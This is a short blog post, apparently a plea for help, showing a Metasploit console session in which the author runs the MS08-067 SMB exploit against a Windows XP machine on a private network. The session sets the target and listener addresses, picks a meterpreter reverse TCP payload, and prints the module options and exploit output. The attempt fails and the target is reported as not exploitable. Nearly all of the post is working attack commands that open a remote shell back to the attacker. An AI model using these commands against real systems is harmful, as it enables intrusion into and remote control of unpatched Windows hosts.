January 13, 2017

problem hacking windows xp

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 192.168.1.13
rhost => 192.168.1.13
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.1.101
lhost => 192.168.1.101
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
—- ————— ——– ———–
RHOST 192.168.1.13 yes The target address
RPORT 445 yes The SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC thread yes Exit technique (Accepted: ”, seh, thread, process, none)
LHOST 192.168.1.101 yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
— —-
0 Automatic Targeting

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.1.101:4444
[*] 192.168.1.13:445 – Automatically detecting the target…
[*] 192.168.1.13:445 – Fingerprint: Windows XP – Service Pack 2 – lang:Unknown
[*] 192.168.1.13:445 – We could not detect the language pack, defaulting to English
[*] 192.168.1.13:445 – Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.1.13:445 – Attempting to trigger the vulnerability…
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > check
[*] 192.168.1.13:445 The target is not exploitable.
=====
target host windows xp sp3

Category : Uncategorized

Leave a Reply

Your email address will not be published. Required fields are marked *

Proudly powered by Bolkya Resha and Software Testing Theme